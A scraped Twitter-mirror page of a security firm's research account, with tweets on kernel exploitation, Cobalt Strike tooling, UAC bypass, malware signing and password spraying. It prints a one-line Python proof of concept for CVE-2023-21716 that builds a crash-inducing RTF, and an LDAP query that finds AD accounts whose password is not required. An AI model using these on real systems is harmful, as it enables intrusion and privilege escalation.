Olivia
Online
Northwave Labs
@NorthwaveLabs
Official Twitter account of the RED, BLUE, CERT & RE teams of Northwave Cyber Security. Sending tweets into the cybernetic universe.
Joined March 2020
131 Following
266 Followers
53 Posts
From Theory to Practice: Kernel Heap Spray Exploitation for Privilege Escalation💥
Part two of the blog series by my colleague Alex: https://t.co/rP2eFoi01t
As the icing on the cake, they shared the complete functional exploit with @OutflankNL for utilisation by their Outflank Security Tooling (OST) customers, enhancing global cyber resilience! (2/2)
Last weekend @tijme presented Elevate & Conquer: A Journey Into Kernel Exploitation, at @BSidesLondon. The presentation explores his and Alex's research on exploiting a zero-day in VPN software, used by 40,000+ organisations worldwide! (1/2)
https://t.co/Prk5xijh0z
New offensive trade-craft added to OST: hijacks for Electron apps. This evasion technique is primarily useful for persistence. Our implementation was inspired upon work done by the @NorthwaveLabs team.
Who to follow
Pedro Ribeiro 
@pedrib1337
Reverse Engineer | Director @ https://t.co/KuU3tiG1Om | Exploit Chef @FlashbackPwn
Marc Smeets
@MarcOverIP
Does a thing or two with red teaming @OutflankNL | part time race and drift car instructor
Michael Barclay
@michaelbarclay_
Principal Security Researcher at Prelude Security
I dived into exploiting leaked code signing certificates to sign malware ✍. A technique that has been actively abused in the wild by threat actors for a long time.
Blog post: https://t.co/zCy93dwMC9
Thrilled to announce that I'll be giving a 2-hour Kernel Driver Exploitation lab at @HITBSecConf, together with my colleague Jan-Jaap. 🥳
If you want to develop your first malicious kernel driver (exploit), join us the 21st of April in Amsterdam!
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
Our red teamer @Expl0itabl3 ported MDI check instance to Python. Use it to your advantage, check if your target uses Microsoft Defender for Identity during your recon phase.
https://t.co/wWJwbaih8R
Cobalt Strike BOF that utilises AMD's Ryzen Master kernel driver to read and write physical memory. It currently escalates privileges from administrator to SYSTEM. Future goal is to add features such as disabling EDR, disabling ETW TI or dumping LSASS.
https://t.co/vErevstmwd
Northwave has conducted research into the psychological effects of a ransomware crisis on people involved in mitigating a ransomware attack. The findings reveal the deep marks that a ransomware crisis leaves on all those affected.
https://t.co/5DDksksUmZ
Cobalt Strike BOF to bypass UAC via the CMSTPLUA COM interface.
It masquerades PEB and utilises COM Elevation Moniker on the CMSTPLUA COM object to execute commands in an elevated context.
https://t.co/1dHYZ9mEZ4
90% of my Twitter DMs are asking me about how to start getting into Malware development. Well, I love answering them but it's easier to write a small thread about it so here we go.
1/12
Cobalt Strike BOF foundation for kernel exploitation using CVE-2021-21551. In its current state, as a PoC, it overwrites the beacon token with the system token (privesc).
https://t.co/JR1Vao7t9c
Windows 11 (May) + Office Pro Plus (April)
+ Preview pane enabled
Interesting maldoc was submitted from Belarus. It uses Word's external link to load the HTML and then uses the "ms-msdt" scheme to execute PowerShell code.
https://t.co/hTdAfHOUx3
Pull requests:
Spray-AD: https://t.co/RbM5i5g9tX
SharpHose: https://t.co/yh6VloY2KH
Kerbrute: https://t.co/k0xxfPG3X6
While this may sound too simple, we've managed to escalate across domains on several occasions by accounts with blank passwords 🔥!
In this blog we describe how it works, and which popular spraying tools we've updated to support empty password spraying: https://t.co/7hoJvkfjCl
Search for AD accounts with the "PASSWD_NOTREQD" flag in CobaltStrike:
ldapsearch (&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) cn
Last Seen Users on Sotwe
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.2M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.6M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.1M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
59.9M followers